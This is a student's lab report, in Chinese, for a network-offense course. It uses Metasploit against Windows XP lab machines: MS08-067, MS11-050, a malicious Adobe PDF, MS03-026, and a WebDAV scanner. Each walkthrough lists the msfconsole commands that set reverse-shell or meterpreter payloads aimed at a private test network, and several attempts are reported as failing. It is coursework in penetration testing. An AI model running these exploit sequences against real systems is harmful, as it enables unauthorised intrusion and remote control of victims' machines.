20155229《網絡對抗技術》Exp5:MSF基礎應用
實驗內容
本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:
一個主動攻擊實踐,如ms08-067;
一個針對瀏覽器的攻擊,如ms11-050;
一個針對客戶端的攻擊,如Adobe;
成功應用任何一個輔助模塊。
以上四個小實踐可不限於以上示例,並要求至少有一個是和其他所有同學不一樣的。
主動攻擊實踐 MS08-067漏洞
msfconsole
進入msf控制臺search ms08_067
查看該漏洞
use exploit/windows/smb/ms08_067_netapi
使用該漏洞show payloads
回鏈攻擊載荷set payload generic/shell_reverse_tcp
set LHOST 192.168.126.128
攻擊機的ip地址set LPORT 5229
攻擊的端口set RHOST 192.168.126.136
靶機的ip地址set target 0
選擇目標系統類型exploit
進行攻擊下圖中展現了攻擊成功
- 在kali中輸入
ipconfig
查看靶機的ip地址
- 在XP中查看靶機的ip地址,兩者相比較,完全一樣。
針對瀏覽器的攻擊 ms11_050
進入
msfconsole
控制臺輸入
use windows/browser/ms11_050_mshtml_cobjectelement
命令使用ms11_050漏洞輸入
set payload windows/meterpreter/reverse_http
- 設置kali的IP地址
set LHOST 192.168.126.128
- 設置端口
set LPORT 5229
- 設置資源標識符路徑
set URIPATH fyh5229
進行攻擊
exploit
將上圖的LOCAL IP 的網址輸入進WIN XP中的IE瀏覽器中,出現遇到問題需要關閉
的窗口。同時360已經給出需要修復的通知。
但是回到KALI建立會話時,IE瀏覽器已經關閉該網頁。
設置瀏覽器的選項,將安全等級設為最低,且啟動了插件設置,但是,會話連接還是失敗。。。
會接著研究這個問題的
針對客戶端的攻擊 Adobe
- 輸入
msfconsole
進入msf控制臺 輸入
search adobe
查找和adobe相關的漏洞我選擇了
windows/fileformat/adobe_cooltype_sing
輸入
set payload windows/meterpreter/reverse_tcp
使用tcp反向連接- 設置IP地址及端口號
- 輸入
set FILENAME 5229.pdf
命令生成pdf文件 進行攻擊
- 下圖為成功生成PDF文件的標誌。
- 根據存儲路徑,找到PDF文件並將其放進靶機裏。
- 但我找了很久都沒有找到該文件,後來,如下圖,選擇
顯示隱藏文件
,這時就能找到隱藏的文件夾了。
- 我先將改文件復制進了我的主機中,立馬被360刪除了。
- 在msf中進入監聽模式
set payload windows/meterpreter/reverse_tcp
tcp反向連接- 設置ip地址和端口號
- 進行攻擊
- 在XP上打開5229.pdf文件,kali中顯示攻擊成功
- 輸入ipconfig,顯示的是xp的ip地址,證明攻擊正確。
輔助模塊 webdav
webdav: WebDAV 一種基於 HTTP 1.1協議的通信協議。由於 WebDAV 已與 Windows XP 和 IIS 集成,因此它具有這兩者所提供的安全特性。其中包括 Internet 信息服務管理單元中指定的 IIS 權限和 NTFS 文件系統中的自由選擇訪問控制列表 (DACL)。
- 進入msf控制臺
- 使用
show auxiliary
命令顯示所有的輔助模塊以及他們的用途。
- 選擇
scanner/http/webdav_scanner
show options
查看該漏洞的配置選項
- 設置了kali的ip地址和線程
- 進行攻擊
- 攻擊的結果如上圖所示,但是該靶機沒有裝IIS。
- 參考WindowsXP系統如何啟用IIS安裝IIS
- 允許
webdav
,再次進行攻擊,會得到[*] 192.168.126.128 (Microsoft-IIS/6.0) has WEBDAV ENABLED
的消息。
RPC接口長主機名遠程緩沖區溢出漏洞(MS03-026)
Remote Procedure Call (RPC)是Windows操作系統使用的一種遠程過程調用協議,RPC提供進程間交互通信機制,允許在某臺計算機上運行的程序無縫地在遠程系統上執行代碼。
- 使用
use exploit/windows/dcerpc/ms03_026_dcom
- 使用
set payload windows/meterpreter/reverse_tcp
tcp反向連接 show options 查看該漏洞的配置選項
set LHOST 192.168.126.128 設置主機ip
set RHOST 192.168.126.137 設置反彈shell的ip
- 進行攻擊,攻擊成功,但是沒辦法建立會話。
"無會話已創建"消息發生的情況:
① 使用的漏洞利用對所選擇的目標不起作用。可以
是一個不同版本的漏洞,或目標配置有問題。
② 您使用的漏洞利用被配置為使用不創建的有效載荷
互動會話。
根據以上提示,
show options
中顯示Windows NT SP3-6a/2000/XP/2003 Universal
都可以使用,檢測了自己的虛擬機,且使用Microsoft Windows XP Professional
和Microsoft Windows XP Professional SP2
兩個版本的虛擬機,都無法建立會話。檢查了所攻擊的漏洞,無誤。
因為該漏洞與RPC協議還有遠程有關,所以我分別打開了虛擬機中的WindowsXP系統安全設置:關閉遠程協助和服務(關閉的地方換成打開) 和 XP上顯示 ‘RPC 服務器不可用’是什麽意思但是還是無法建立會話。
好了,我真的是沒法解決這個問題了。。。
實驗後問題回答
用自己的話解釋什麽是exploit,payload,encode.
exploit
英文翻譯為利用
,黑客就是利用漏洞對電腦進行攻擊,有漏洞不一定可以利用,但可以利用的一定有漏洞。payload
:有效載荷。通常在傳輸數據時,為了使數據傳輸更可靠,要把原始數據分批傳輸,並且在每一批數據的頭和尾都加上一定的輔助信息,而其中的原始數據就是payloadencode
:編碼器,用來給payload進行編碼,保護payload不被發現
實驗總結與體會
這次實驗其實不難,但是不代表每次攻擊都能成功,也不代表每次攻擊都能成功建立會話,我做了好幾個實驗,成功的占少數,還有些失敗的我沒寫上來。
雖然失敗的占多數,但無疑這次實驗通過自己查找資料學習漏洞學到了很多知識。
20155229《網絡對抗技術》Exp5:MSF基礎應用